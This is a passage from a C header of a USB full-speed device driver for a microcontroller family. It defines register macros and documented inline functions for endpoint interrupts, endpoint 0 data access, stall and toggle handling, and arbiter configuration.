#define USBFS_USBDEV_ARB_EP_DMA_TERMIN_Msk USBFS_USBDEV_ARB_EP1_SR_DMA_TERMIN_Msk
/** \} group_usbfs_dev_drv_reg_macros_arb_ep_intr */
/**
* \addtogroup group_usbfs_dev_drv_reg_macros
* \{
*/
/** Data toggle mask in CNT0 register */
#define USBFS_USBDEV_SIE_EP_DATA_TOGGLE_Msk USBFS_USBDEV_SIE_EP1_CNT0_DATA_TOGGLE_Msk
/** \} group_usbfs_dev_drv_reg_macros */
/** /cond INTERNAL */
/* Extended cyip_usbfs.h */
/* Count registers includes CRC size (2 bytes) */
#define CY_USBFS_DEV_DRV_EP_CRC_SIZE (2U)
/* DYN_RECONFIG register */
#define USBFS_USBDEV_DYN_RECONFIG_EN_Msk USBFS_USBDEV_DYN_RECONFIG_DYN_CONFIG_EN_Msk
#define USBFS_USBDEV_DYN_RECONFIG_EPNO_Pos USBFS_USBDEV_DYN_RECONFIG_DYN_RECONFIG_EPNO_Pos
#define USBFS_USBDEV_DYN_RECONFIG_EPNO_Msk USBFS_USBDEV_DYN_RECONFIG_DYN_RECONFIG_EPNO_Msk
#define USBFS_USBDEV_DYN_RECONFIG_RDY_STS_Msk USBFS_USBDEV_DYN_RECONFIG_DYN_RECONFIG_RDY_STS_Msk
/* LPM_CTL register */
#define USBFS_USBLPM_LPM_CTL_LPM_RESP_Pos (USBFS_USBLPM_LPM_CTL_LPM_ACK_RESP_Pos)
#define USBFS_USBLPM_LPM_CTL_LPM_RESP_Msk (USBFS_USBLPM_LPM_CTL_LPM_ACK_RESP_Msk | \
USBFS_USBLPM_LPM_CTL_NYET_EN_Msk)
/* ARB_EP_CFG 1-8 registers (default configuration) */
#define USBFS_USBDEV_ARB_EP_CFG_CRC_BYPASS_Msk USBFS_USBDEV_ARB_EP1_CFG_CRC_BYPASS_Msk
#define USBFS_USBDEV_ARB_EP_CFG_RESET_PTR_Msk USBFS_USBDEV_ARB_EP1_CFG_CRC_BYPASS_Msk
/** /endcond */
/*******************************************************************************
* In-line Function Implementation
*******************************************************************************/
/**
* \addtogroup group_usbfs_drv_drv_reg_interrupt_sources
* \{
*/
/*******************************************************************************
* Function Name: Cy_USBFS_Dev_Drv_GetSieInterruptStatus
****************************************************************************//**
*
* Returns the SIE interrupt request register.
* This register contains the current status of the SIE interrupt sources.
*
* \param base
* The pointer to the USBFS instance.
*
* \return
* The current status of the SIE interrupt sources.
* Each constant is a bit field value. The value returned may have multiple
* bits set to indicate the current status.
* See \ref group_usbfs_dev_drv_reg_macros_sie_intr for the set of constants.
*
*******************************************************************************/
__STATIC_INLINE uint32_t Cy_USBFS_Dev_Drv_GetSieInterruptStatus(USBFS_Type const *base)
{
return USBFS_DEV_LPM_INTR_SIE(base);
}
/*******************************************************************************
* Function Name: Cy_USBFS_Dev_Drv_SetSieInterruptMask
****************************************************************************//**
*
* Writes the SIE interrupt mask register.
* This register configures which bits from the SIE interrupt request register
* can trigger an interrupt event.
*
* \param base
* The pointer to the USBFS instance.
*
* \param mask
* Enabled SIE interrupt sources.
* See \ref group_usbfs_dev_drv_reg_macros_sie_intr for the set of constants.
*
*******************************************************************************/
__STATIC_INLINE void Cy_USBFS_Dev_Drv_SetSieInterruptMask(USBFS_Type *base, uint32_t mask)
{
USBFS_DEV_LPM_INTR_SIE_MASK(base) = mask;
}
/*******************************************************************************
* Function Name: Cy_USBFS_Dev_Drv_GetSieInterruptMask
****************************************************************************//**
*
* Returns the SIE interrupt mask register.
* This register specifies which bits from the SIE interrupt request register
* trigger can an interrupt event.
*
* \param base
* The pointer to the USBFS instance.
*
* \return
* Enabled SIE interrupt sources.
* See \ref group_usbfs_dev_drv_reg_macros_sie_intr for the set of constants.
*
*******************************************************************************/
__STATIC_INLINE uint32_t Cy_USBFS_Dev_Drv_GetSieInterruptMask(USBFS_Type const *base)
{
return USBFS_DEV_LPM_INTR_SIE_MASK(base);
}
/*******************************************************************************
* Function Name: Cy_USBFS_Dev_Drv_GetSieInterruptStatusMasked
****************************************************************************//**
*
* Returns the SIE interrupt masked request register.
* This register contains a logical AND of corresponding bits from the SIE
* interrupt request and mask registers.
* This function is intended to be used in the interrupt service routine to
* identify which of the enabled SIE interrupt sources caused the interrupt
* event.
*
* \param base
* The pointer to the USBFS instance.
*
* \return
* The current status of enabled SIE interrupt sources.
* See \ref group_usbfs_dev_drv_reg_macros_sie_intr for the set of constants.
*
*******************************************************************************/
__STATIC_INLINE uint32_t Cy_USBFS_Dev_Drv_GetSieInterruptStatusMasked(USBFS_Type const *base)
{
return USBFS_DEV_LPM_INTR_SIE_MASKED(base);
}
/*******************************************************************************
* Function Name: Cy_USBFS_Dev_Drv_ClearSieInterrupt
****************************************************************************//**
*
* Clears the SIE interrupt sources in the interrupt request register.
*
* \param base
* The pointer to the USBFS instance.
*
* \param mask
* The SIE interrupt sources to be cleared.
* See \ref group_usbfs_dev_drv_reg_macros_sie_intr for the set of constants.
*
*******************************************************************************/
__STATIC_INLINE void Cy_USBFS_Dev_Drv_ClearSieInterrupt(USBFS_Type *base, uint32_t mask)
{
USBFS_DEV_LPM_INTR_SIE(base) = mask;
(void) USBFS_DEV_LPM_INTR_SIE(base);
}
/*******************************************************************************
* Function Name: Cy_USBFS_Dev_Drv_SetSieInterrupt
****************************************************************************//**
*
* Sets the SIE interrupt sources in the interrupt request register.
*
* \param base
* The pointer to the USBFS instance.
*
* \param mask
* The SIE interrupt sources to be set in the SIE interrupt request register.
* See \ref group_usbfs_dev_drv_reg_macros_sie_intr for the set of constants.
*
*******************************************************************************/
__STATIC_INLINE void Cy_USBFS_Dev_Drv_SetSieInterrupt(USBFS_Type *base, uint32_t mask)
{
USBFS_DEV_LPM_INTR_SIE_SET(base) = mask;
}
/** \} group_usbfs_drv_drv_reg_interrupt_sources */
/**
* \addtogroup group_usbfs_drv_drv_reg_ep0_access
* \{
*/
/*******************************************************************************
* Function Name: Cy_USBFS_Dev_Drv_WriteEp0Mode
****************************************************************************//**
*
* Sets a mode in the CR0 register of endpoint 0 (clears all other bits in the
* register).
*
* \param base
* The pointer to the USBFS instance.
*
* \param mode
* SIE mode defines the data endpoint 0 response to a host request.
* See \ref group_usbfs_dev_drv_reg_macros_sie_mode for the set of constants.
*
*******************************************************************************/
__STATIC_INLINE void Cy_USBFS_Dev_Drv_WriteEp0Mode(USBFS_Type *base, uint32_t mode)
{
USBFS_DEV_EP0_CR(base) = mode;
(void) USBFS_DEV_EP0_CR(base);
}
/*******************************************************************************
* Function Name: Cy_USBFS_Dev_Drv_ReadEp0Mode
****************************************************************************//**
*
* Returns a mode in the CR0 register of endpoint 0.
*
* \param base
* The pointer to the USBFS instance.
*
* \return
* SIE mode (defines the endpoint 0 response to a host request).
* See \ref group_usbfs_dev_drv_reg_macros_sie_mode for the set of constants.
*
*******************************************************************************/
__STATIC_INLINE uint32_t Cy_USBFS_Dev_Drv_ReadEp0Mode(USBFS_Type const *base)
{
return USBFS_DEV_EP0_CR(base);
}
/*******************************************************************************
* Function Name: Cy_USBFS_Dev_Drv_SetSieEpCount
****************************************************************************//**
*
* Configures the number of bytes and toggle bit to return to a host read request
* to endpoint 0.
*
* \param base
* The pointer to the USBFS instance.
*
* \param count
* The number of bytes to return to a host read request.
*
* \param toggle
* The data toggle bit.
* The range of valid values: 0 and \ref USBFS_USBDEV_SIE_EP_DATA_TOGGLE_Msk.
*
*******************************************************************************/
__STATIC_INLINE void Cy_USBFS_Dev_Drv_SetEp0Count(USBFS_Type *base, uint32_t count, uint32_t toggle)
{
count = _VAL2FLD(USBFS_USBDEV_EP0_CNT_BYTE_COUNT, count);
USBFS_DEV_EP0_CNT(base) = CY_USBFS_DEV_DRV_WRITE_ODD(count | toggle);
}
/*******************************************************************************
* Function Name: Cy_USBFS_Dev_Drv_GetEp0Count
****************************************************************************//**
*
* Returns the number of data bytes written into endpoint 0 by the host.
*
* \param base
* The pointer to the USBFS instance.
*
* \return
* The number of bytes written by the host into the endpoint.
*
*******************************************************************************/
__STATIC_INLINE uint32_t Cy_USBFS_Dev_Drv_GetEp0Count(USBFS_Type const *base)
{
uint32_t ep0Cnt = CY_USBFS_DEV_READ_ODD(USBFS_DEV_EP0_CNT(base));
/* Excludes the CRC size */
return (_FLD2VAL(USBFS_USBDEV_EP0_CNT_BYTE_COUNT, ep0Cnt) - CY_USBFS_DEV_DRV_EP_CRC_SIZE);
}
/*******************************************************************************
* Function Name: Cy_USBFS_Dev_Drv_WriteEp0Data
****************************************************************************//**
*
* Writes an 8-bit byte into the endpoint 0 hardware buffer.
*
* \param base
* The pointer to the USBFS instance.
*
* \param idx
* The index of the endpoint 0 hardware buffer entry.
* Valid range: 0 - ( \ref CY_USBFS_DEV_DRV_EP0_BUFFER_SIZE - 1 ).
*
* \param value
* The value to be written into the endpoint 0 hardware buffer.
*
*******************************************************************************/
__STATIC_INLINE void Cy_USBFS_Dev_Drv_WriteEp0Data(USBFS_Type *base, uint32_t idx, uint32_t value)
{
if (0U == (idx & 0x1U))
{
USBFS_DEV_EP0_DR(base, idx) = value;
}
else
{
/* Applies a special write for odd offset registers */
USBFS_DEV_EP0_DR(base, idx) = CY_USBFS_DEV_DRV_WRITE_ODD(value);
}
}
/*******************************************************************************
* Function Name: Cy_USBFS_Dev_Drv_ReadEp0Data
****************************************************************************//**
*
* Reads an 8-bit byte from the endpoint 0 hardware buffer.
*
* \param base
* The pointer to the USBFS instance.
*
* \param idx
* The index of the endpoint 0 hardware buffer entry.
* Valid range: 0 - ( \ref CY_USBFS_DEV_DRV_EP0_BUFFER_SIZE - 1 ).
*
* \return
* The byte of data to read from the hardware buffer.
*
*******************************************************************************/
__STATIC_INLINE uint32_t Cy_USBFS_Dev_Drv_ReadEp0Data(USBFS_Type const *base, uint32_t idx)
{
uint32_t value;
if (0U == (idx & 0x1U))
{
value = USBFS_DEV_EP0_DR(base, idx);
}
else
{
/* Applies a special write for odd offset registers */
value = CY_USBFS_DEV_READ_ODD(USBFS_DEV_EP0_DR(base, idx));
}
return (value);
}
/** \} group_usbfs_drv_drv_reg_ep0_access */
/**
* \addtogroup group_usbfs_drv_drv_reg_sie_access
* \{
*/
/*******************************************************************************
* Function Name: Cy_USBFS_Dev_Drv_SetSieEpMode
****************************************************************************//**
*
* Sets SIE mode in the CR0 register of the endpoint (does not touch other bits).
* All other bits except NAK_INT_EN are cleared by the hardware on any write
* in the register.
*
* \param base
* The pointer to the USBFS instance.
*
* \param endpoint
* Physical endpoint number.
* Valid range: 0 - ( \ref CY_USBFS_DEV_DRV_NUM_EPS_MAX - 1 ).
*
* \param mode
* SIE mode defines data endpoint response to host request.
* See \ref group_usbfs_dev_drv_reg_macros_sie_mode for the set of constants.
*
*******************************************************************************/
__STATIC_INLINE void Cy_USBFS_Dev_Drv_SetSieEpMode(USBFS_Type *base, uint32_t endpoint, uint32_t mode)
{
USBFS_DEV_SIE_EP_CR0(base, endpoint) = _CLR_SET_FLD32U(USBFS_DEV_SIE_EP_CR0(base, endpoint),
USBFS_USBDEV_SIE_EP1_CR0_MODE, mode);
(void) USBFS_DEV_SIE_EP_CR0(base, endpoint);
}
/*******************************************************************************
* Function Name: Cy_USBFS_Dev_Drv_GetSieEpMode
****************************************************************************//**
*
* Returns SIE mode in the CR0 register of the endpoint.
*
* \param base
* The pointer to the USBFS instance.
*
* \param endpoint
* Physical endpoint number.
* Valid range: 0 - ( \ref CY_USBFS_DEV_DRV_NUM_EPS_MAX - 1 ).
*
* \return
* SIE mode (defines data endpoint response to host request).
* See \ref group_usbfs_dev_drv_reg_macros_sie_mode for the set of constants.
*
*******************************************************************************/
__STATIC_INLINE uint32_t Cy_USBFS_Dev_Drv_GetSieEpMode(USBFS_Type const *base, uint32_t endpoint)
{
return (USBFS_DEV_SIE_EP_CR0(base, endpoint) & USBFS_USBDEV_SIE_EP1_CR0_MODE_Msk);
}
/*******************************************************************************
* Function Name: Cy_USBFS_Dev_Drv_SetSieEpStall
****************************************************************************//**
*
* Configures endpoint to STALL requests.
*
* \param base
* The pointer to the USBFS instance.
*
* \param inDirection
* Defines whether endpoint direction is IN (true) or OUT (false).
*
* \param endpoint
* Physical endpoint number.
* Valid range: 0 - ( \ref CY_USBFS_DEV_DRV_NUM_EPS_MAX - 1 ).
*
*******************************************************************************/
__STATIC_INLINE void Cy_USBFS_Dev_Drv_SetSieEpStall(USBFS_Type *base, bool inDirection, uint32_t endpoint)
{
/* STALL endpoint */
USBFS_DEV_SIE_EP_CR0(base, endpoint) = USBFS_USBDEV_SIE_EP1_CR0_STALL_Msk |
(inDirection ? CY_USBFS_DEV_DRV_EP_CR_ACK_IN :
CY_USBFS_DEV_DRV_EP_CR_ACK_OUT);
(void) USBFS_DEV_SIE_EP_CR0(base, endpoint);
}
/*******************************************************************************
* Function Name: Cy_USBFS_Dev_Drv_ClearSieEpStall
****************************************************************************//**
*
* Writes SIE mode register of the data endpoint and clears other bits in this
* register.
*
* \param base
* The pointer to the USBFS instance.
*
* \param endpoint
* Physical endpoint number.
* Valid range: 0 - ( \ref CY_USBFS_DEV_DRV_NUM_EPS_MAX - 1 ).
*
* \param mode
* SIE mode defines data endpoint response to host request.
* See \ref group_usbfs_dev_drv_reg_macros_sie_mode for the set of constants.
*
*******************************************************************************/
__STATIC_INLINE void Cy_USBFS_Dev_Drv_ClearSieEpStall(USBFS_Type *base, uint32_t endpoint, uint32_t mode)
{
/* Set mode bits */
uint32_t regVal = _CLR_SET_FLD32U(USBFS_DEV_SIE_EP_CR0(base, endpoint),
USBFS_USBDEV_SIE_EP1_CR0_MODE, mode);
/* Clear STALL condition */
regVal &= ~USBFS_USBDEV_SIE_EP1_CR0_STALL_Msk;
/* Clear STALL condition and set mode */
USBFS_DEV_SIE_EP_CR0(base, endpoint) = regVal;
(void) USBFS_DEV_SIE_EP_CR0(base, endpoint);
}
/*******************************************************************************
* Function Name: Cy_USBFS_Dev_Drv_GetSieEpError
****************************************************************************//**
*
* Returns value of data endpoint error in transaction bit.
*
* \param base
* The pointer to the USBFS instance.
*
* \param endpoint
* Physical endpoint number.
* Valid range: 0 - ( \ref CY_USBFS_DEV_DRV_NUM_EPS_MAX - 1 ).
*
* \return
* Value of data endpoint error in transaction bit.
*
*******************************************************************************/
__STATIC_INLINE uint32_t Cy_USBFS_Dev_Drv_GetSieEpError(USBFS_Type const *base, uint32_t endpoint)
{
return (USBFS_DEV_SIE_EP_CR0(base, endpoint) & USBFS_USBDEV_SIE_EP1_CR0_ERR_IN_TXN_Msk);
}
/*******************************************************************************
* Function Name: Cy_USBFS_Dev_Drv_GetSieEpToggle
****************************************************************************//**
*
* Returns current value of data endpoint toggle bit.
*
* \param base
* The pointer to the USBFS instance.
*
* \param endpoint
* Physical endpoint number.
* Valid range: 0 - ( \ref CY_USBFS_DEV_DRV_NUM_EPS_MAX - 1 ).
*
* \return
* Value of data endpoint toggle bit.
*
*******************************************************************************/
__STATIC_INLINE uint32_t Cy_USBFS_Dev_Drv_GetSieEpToggle(USBFS_Type const *base, uint32_t endpoint)
{
/* Return data toggle bit */
return (USBFS_DEV_SIE_EP_CNT0(base, endpoint) & USBFS_USBDEV_SIE_EP1_CNT0_DATA_TOGGLE_Msk);
}
/*******************************************************************************
* Function Name: Cy_USBFS_Dev_Drv_ClearSieEpToggle
****************************************************************************//**
*
* Resets to zero data endpoint toggle bit.
*
* \param base
* The pointer to the USBFS instance.
*
* \param endpoint
* Physical endpoint number.
* Valid range: 0 - ( \ref CY_USBFS_DEV_DRV_NUM_EPS_MAX - 1 ).
*
* \return
* Number of bytes written by the host into the endpoint.
*
*******************************************************************************/
__STATIC_INLINE void Cy_USBFS_Dev_Drv_ClearSieEpToggle(USBFS_Type *base, uint32_t endpoint)
{
/* Clear data toggle bit */
USBFS_DEV_SIE_EP_CNT0(base, endpoint) &= ~USBFS_USBDEV_SIE_EP1_CNT0_DATA_TOGGLE_Msk;
}
/*******************************************************************************
* Function Name: Cy_USBFS_Dev_Drv_GetSieEpCount
****************************************************************************//**
*
* Returns the number of data bytes written into the OUT data endpoint
* by the host.
*
* \param base
* The pointer to the USBFS instance.
*
* \param endpoint
* Physical endpoint number.
* Valid range: 0 - ( \ref CY_USBFS_DEV_DRV_NUM_EPS_MAX - 1 ).
*
* \return
* Number of bytes written by the host into the endpoint.
*
*******************************************************************************/
__STATIC_INLINE uint32_t Cy_USBFS_Dev_Drv_GetSieEpCount(USBFS_Type const *base, uint32_t endpoint)
{
uint32_t size;
/* Get number of bytes transmitted or received by SIE */
size = _FLD2VAL(USBFS_USBDEV_SIE_EP1_CNT0_DATA_COUNT_MSB, USBFS_DEV_SIE_EP_CNT0(base, endpoint));
size = (size << 8U) | CY_USBFS_DEV_READ_ODD(USBFS_DEV_SIE_EP_CNT1(base, endpoint));
/* Exclude CRC size */
return (size - CY_USBFS_DEV_DRV_EP_CRC_SIZE);
}
/*******************************************************************************
* Function Name: Cy_USBFS_Dev_Drv_SetSieEpCount
****************************************************************************//**
*
* Configures number of bytes and toggle bit to return on the host read request
* to the IN data endpoint.
*
* \param base
* The pointer to the USBFS instance.
*
* \param endpoint
* Physical endpoint number.
* Valid range: 0 - ( \ref CY_USBFS_DEV_DRV_NUM_EPS_MAX - 1 ).
*
* \param count
* The number of bytes to return on the host read request.
*
* \param toggle
* The data toggle bit.
* The range of valid values: 0 and \ref USBFS_USBDEV_SIE_EP_DATA_TOGGLE_Msk.
*
*******************************************************************************/
__STATIC_INLINE void Cy_USBFS_Dev_Drv_SetSieEpCount(USBFS_Type *base, uint32_t endpoint,
uint32_t count, uint32_t toggle)
{
USBFS_DEV_SIE_EP_CNT1(base, endpoint) = (uint32_t) CY_USBFS_DEV_DRV_WRITE_ODD(CY_LO8(count));
USBFS_DEV_SIE_EP_CNT0(base, endpoint) = (uint32_t) CY_HI8(count) | toggle;
}
/*******************************************************************************
* Function Name: Cy_USBFS_Dev_Drv_GetSieAllEpsInterruptStatus
****************************************************************************//**
*
* Returns the SIE data endpoints interrupt request register.
* This register contains the current status of the SIE data endpoints transfer
* completion interrupt.
*
* \param base
* The pointer to the USBFS instance.
*
* \return
* The current status of the SIE interrupt sources.
* The returned status specifies for which endpoint interrupt is active as
* follows: bit 0 corresponds to data endpoint 1, bit 1 data endpoint 2 and so
* on up to \ref CY_USBFS_DEV_DRV_NUM_EPS_MAX.
*
*******************************************************************************/
__STATIC_INLINE uint32_t Cy_USBFS_Dev_Drv_GetSieAllEpsInterruptStatus(USBFS_Type const *base)
{
return USBFS_DEV_SIE_EP_INT_SR(base);
}
/*******************************************************************************
* Function Name: Cy_USBFS_Dev_Drv_EnableSieEpInterrupt
****************************************************************************//**
*
* Enables SIE data endpoint transfer completion interrupt.
*
* \param base
* The pointer to the USBFS instance.
*
* \param endpoint
* Physical endpoint number.
* Valid range: 0 - ( \ref CY_USBFS_DEV_DRV_NUM_EPS_MAX - 1 ).
*
*******************************************************************************/
__STATIC_INLINE void Cy_USBFS_Dev_Drv_EnableSieEpInterrupt(USBFS_Type *base, uint32_t endpoint)
{
USBFS_DEV_SIE_EP_INT_EN(base) |= (uint32_t)(1UL << endpoint);
}
/*******************************************************************************
* Function Name: Cy_USBFS_Dev_Drv_DisableSieEpInterrupt
****************************************************************************//**
*
* Disables SIE data endpoint transfer completion interrupt.
*
* \param base
* The pointer to the USBFS instance.
*
* \param endpoint
* Physical endpoint number.
* Valid range: 0 - ( \ref CY_USBFS_DEV_DRV_NUM_EPS_MAX - 1 ).
*
*******************************************************************************/
__STATIC_INLINE void Cy_USBFS_Dev_Drv_DisableSieEpInterrupt(USBFS_Type *base, uint32_t endpoint)
{
USBFS_DEV_SIE_EP_INT_EN(base) &= ~ (uint32_t)(1UL << endpoint);
}
/*******************************************************************************
* Function Name: Cy_USBFS_Dev_Drv_ClearSieEpInterrupt
****************************************************************************//**
*
* Clears the SIE EP interrupt sources in the interrupt request register.
*
* \param base
* The pointer to the USBFS instance.
*
* \param endpoint
* Physical endpoint number.
* Valid range: 0 - ( \ref CY_USBFS_DEV_DRV_NUM_EPS_MAX - 1 ).
*
*******************************************************************************/
__STATIC_INLINE void Cy_USBFS_Dev_Drv_ClearSieEpInterrupt(USBFS_Type *base, uint32_t endpoint)
{
USBFS_DEV_SIE_EP_INT_SR(base) = (uint32_t)(1UL << endpoint);
(void) USBFS_DEV_SIE_EP_INT_SR(base);
}
/** \} group_usbfs_drv_drv_reg_sie_access */
/**
* \addtogroup group_usbfs_drv_drv_reg_arbiter
* \{
*/
/*******************************************************************************
* Function Name: Cy_USBFS_Dev_Drv_GetArbAllEpsInterruptStatus
****************************************************************************//**
*
* Returns the arbiter interrupt request register.
* This register contains the current status of the data endpoints arbiter
* interrupt.
*
* \param base
* The pointer to the USBFS instance.
*
* \return
* The current status of the SIE interrupt sources.
* The returned status specifies for which endpoint interrupt is active as
* follows: bit 0 corresponds to data endpoint 1, bit 1 data endpoint 2, and so
* on up to \ref CY_USBFS_DEV_DRV_NUM_EPS_MAX.
*
*******************************************************************************/
__STATIC_INLINE uint32_t Cy_USBFS_Dev_Drv_GetArbAllEpsInterruptStatus(USBFS_Type const *base)
{
return CY_USBFS_DEV_READ_ODD(USBFS_DEV_ARB_INT_SR(base));
}
/*******************************************************************************
* Function Name: Cy_USBFS_Dev_Drv_EnableArbEpInterrupt
****************************************************************************//**
*
* Enables the arbiter interrupt for the specified data endpoint.
*
* \param base
* The pointer to the USBFS instance.
*
* \param endpoint
* Physical endpoint number.
* Valid range: 0 - ( \ref CY_USBFS_DEV_DRV_NUM_EPS_MAX - 1 ).
*
*******************************************************************************/
__STATIC_INLINE void Cy_USBFS_Dev_Drv_EnableArbEpInterrupt(USBFS_Type *base, uint32_t endpoint)
{
USBFS_DEV_ARB_INT_EN(base) |= (uint32_t)(1UL << endpoint);
}
/*******************************************************************************
* Function Name: Cy_USBFS_Dev_Drv_DisableArbEpInterrupt
****************************************************************************//**
*
* Disabled arbiter interrupt for the specified data endpoint.
*
* \param base
* The pointer to the USBFS instance.
*
* \param endpoint
* Physical endpoint number.
* Valid range: 0 - ( \ref CY_USBFS_DEV_DRV_NUM_EPS_MAX - 1 ).
*
*******************************************************************************/
__STATIC_INLINE void Cy_USBFS_Dev_Drv_DisableArbEpInterrupt(USBFS_Type *base, uint32_t endpoint)
{
USBFS_DEV_ARB_INT_EN(base) &= ~(uint32_t)(1UL << endpoint);
}
/*******************************************************************************
* Function Name: Cy_USBFS_Dev_Drv_SetArbEpInterruptMask
****************************************************************************//**
*
* Enables the arbiter interrupt sources which trigger the arbiter interrupt for
* the specified data endpoint.
*
* \param base
* The pointer to the USBFS instance.
*
* \param endpoint
* Physical endpoint number.
* Valid range: 0 - ( \ref CY_USBFS_DEV_DRV_NUM_EPS_MAX - 1 ).
*
* \param mask
* The arbiter interrupt sources.
* See \ref group_usbfs_dev_drv_reg_macros_arb_ep_intr for the set of constants.
*
*******************************************************************************/
__STATIC_INLINE void Cy_USBFS_Dev_Drv_SetArbEpInterruptMask(USBFS_Type *base, uint32_t endpoint, uint32_t mask)
{
USBFS_DEV_ARB_EP_INT_EN(base, endpoint) = mask;
}
/*******************************************************************************
* Function Name: Cy_USBFS_Dev_Drv_GetArbEpInterruptMask
****************************************************************************//**
*
* Returns the arbiter interrupt sources which trigger the arbiter interrupt for
* the specified data endpoint.
*
* \param base
* The pointer to the USBFS instance.
*
* \param endpoint
* Physical endpoint number.
* Valid range: 0 - ( \ref CY_USBFS_DEV_DRV_NUM_EPS_MAX - 1 ).
*
* \return
* The arbiter interrupt sources.
* See \ref group_usbfs_dev_drv_reg_macros_arb_ep_intr for the set of constants.
*
*******************************************************************************/
__STATIC_INLINE uint32_t Cy_USBFS_Dev_Drv_GetArbEpInterruptMask(USBFS_Type const *base, uint32_t endpoint)
{
return USBFS_DEV_ARB_EP_INT_EN(base, endpoint);
}
/*******************************************************************************
* Function Name: Cy_USBFS_Dev_Drv_GetArbEpInterruptStatusMasked
****************************************************************************//**
*
* Returns the current status of the enabled arbiter interrupt sources for
* the specified data endpoint.
*
* \param base
* The pointer to the USBFS instance.
*
* \param endpoint
* Physical endpoint number.
* Valid range: 0 - ( \ref CY_USBFS_DEV_DRV_NUM_EPS_MAX - 1 ).
*
* \return
* The current status of the enabled arbiter interrupt sources
* See \ref group_usbfs_dev_drv_reg_macros_arb_ep_intr for the set of constants.
*
*******************************************************************************/
__STATIC_INLINE uint32_t Cy_USBFS_Dev_Drv_GetArbEpInterruptStatusMasked(USBFS_Type const *base, uint32_t endpoint)
{
uint32_t mask = CY_USBFS_DEV_READ_ODD(USBFS_DEV_ARB_EP_INT_EN(base, endpoint));
return (USBFS_DEV_ARB_EP_SR(base, endpoint) & mask);
}
/*******************************************************************************
* Function Name: Cy_USBFS_Dev_Drv_ClearArbEpInterrupt
****************************************************************************//**
*
* Clears the current status of the arbiter interrupt sources for the specified
* data endpoint.
*
* \param base
* The pointer to the USBFS instance.
*
* \param endpoint
* Physical endpoint number.
* Valid range: 0 - ( \ref CY_USBFS_DEV_DRV_NUM_EPS_MAX - 1 ).
*
* \param mask
* The arbiter interrupt sources to be cleared.
* See \ref group_usbfs_dev_drv_reg_macros_arb_ep_intr for the set of constants.
*
*******************************************************************************/
__STATIC_INLINE void Cy_USBFS_Dev_Drv_ClearArbEpInterrupt(USBFS_Type *base, uint32_t endpoint, uint32_t mask)
{
USBFS_DEV_ARB_EP_SR(base, endpoint) = mask;
(void) USBFS_DEV_ARB_EP_SR(base, endpoint);
}
/*******************************************************************************
* Function Name: Cy_USBFS_Dev_Drv_SetArbEpConfig
****************************************************************************//**
*
* Writes the configuration register for the specified data endpoint.
*
* \param base
* The pointer to the USBFS instance.
*
* \param endpoint
* Physical endpoint number.
* Valid range: 0 - ( \ref CY_USBFS_DEV_DRV_NUM_EPS_MAX - 1 ).
*
* \param cfg
* The value written into the data endpoint configuration register.
*
*******************************************************************************/
__STATIC_INLINE void Cy_USBFS_Dev_Drv_SetArbEpConfig(USBFS_Type *base, uint32_t endpoint, uint32_t cfg)
{
USBFS_DEV_ARB_EP_CFG(base, endpoint) = cfg;
}
/*******************************************************************************
* Function Name: Cy_USBFS_Dev_Drv_SetArbCfgEpInReady
****************************************************************************//**
*
* Notifies hardware that IN endpoint data buffer is read to be loaded in
* the hardware buffer.
*
* \param base
* The pointer to the USBFS instance.
*
* \param endpoint
* Physical endpoint number.
* Valid range: 0 - ( \ref CY_USBFS_DEV_DRV_NUM_EPS_MAX - 1 ).
*
*******************************************************************************/
__STATIC_INLINE void Cy_USBFS_Dev_Drv_SetArbCfgEpInReady(USBFS_Type *base, uint32_t endpoint)
{
USBFS_DEV_ARB_EP_CFG(base, endpoint) |= USBFS_USBDEV_ARB_EP1_CFG_IN_DATA_RDY_Msk;
}
/*******************************************************************************
* Function Name: Cy_USBFS_Dev_Drv_ClearArbCfgEpInReady
****************************************************************************//**
*
* Clears hardware notification that IN endpoint data buffer is read to be loaded
* in the hardware buffer. This function needs to be called after buffer was
* copied into the hardware buffer.
*
* \param base
* The pointer to the USBFS instance.
*
* \param endpoint
* Physical endpoint number.
* Valid range: 0 - ( \ref CY_USBFS_DEV_DRV_NUM_EPS_MAX - 1 ).
*
*******************************************************************************/
__STATIC_INLINE void Cy_USBFS_Dev_Drv_ClearArbCfgEpInReady(USBFS_Type *base, uint32_t endpoint)
{
USBFS_DEV_ARB_EP_CFG(base, endpoint) &= ~USBFS_USBDEV_ARB_EP1_CFG_IN_DATA_RDY_Msk;
}
/*******************************************************************************
* Function Name: Cy_USBFS_Dev_Drv_TriggerArbCfgEpDmaReq
****************************************************************************//**
*
* Triggers a DMA request to read from or write data into the hardware buffer.
*
* \param base
* The pointer to the USBFS instance.
*
* \param endpoint
* Physical endpoint number.
* Valid range: 0 - ( \ref CY_USBFS_DEV_DRV_NUM_EPS_MAX - 1 ).
*
*******************************************************************************/
__STATIC_INLINE void Cy_USBFS_Dev_Drv_TriggerArbCfgEpDmaReq(USBFS_Type *base, uint32_t endpoint)
{
/* Generates DMA request */
USBFS_DEV_ARB_EP_CFG(base, endpoint) |= USBFS_USBDEV_ARB_EP1_CFG_DMA_REQ_Msk;
(void) USBFS_DEV_ARB_EP_CFG(base, endpoint);
USBFS_DEV_ARB_EP_CFG(base, endpoint) &= ~USBFS_USBDEV_ARB_EP1_CFG_DMA_REQ_Msk;
(void) USBFS_DEV_ARB_EP_CFG(base, endpoint);
}
/*******************************************************************************
* Function Name: Cy_USBFS_Dev_Drv_SetArbWriteAddr
****************************************************************************//**
*
* Sets write address in the hardware buffer for the specified endpoint.
* This is the start address of the endpoint buffer.
*
* \param base
* The pointer to the USBFS instance.
*
* \param endpoint
* Physical endpoint number.
* Valid range: 0 - ( \ref CY_USBFS_DEV_DRV_NUM_EPS_MAX - 1 ).
*
* \param wa
* Write address value.
*
*******************************************************************************/
__STATIC_INLINE void Cy_USBFS_Dev_Drv_SetArbWriteAddr(USBFS_Type *base, uint32_t endpoint, uint32_t wa)
{
USBFS_DEV_ARB_RW_WA16(base, endpoint) = wa;
}
/*******************************************************************************
* Function Name: Cy_USBFS_Dev_Drv_SetArbReadAddr
****************************************************************************//**
*
* Sets read address in the hardware buffer for the specified endpoint.
* This is the start address of the endpoint buffer.
*
* \param base
* The pointer to the USBFS instance.
*
* \param endpoint
* Physical endpoint number.
* Valid range: 0 - ( \ref CY_USBFS_DEV_DRV_NUM_EPS_MAX - 1 ).
*
* \param ra
* Read address value.
*
*******************************************************************************/
__STATIC_INLINE void Cy_USBFS_Dev_Drv_SetArbReadAddr(USBFS_Type *base, uint32_t endpoint, uint32_t ra)
{
USBFS_DEV_ARB_RW_RA16(base, endpoint) = ra;
}
/*******************************************************************************
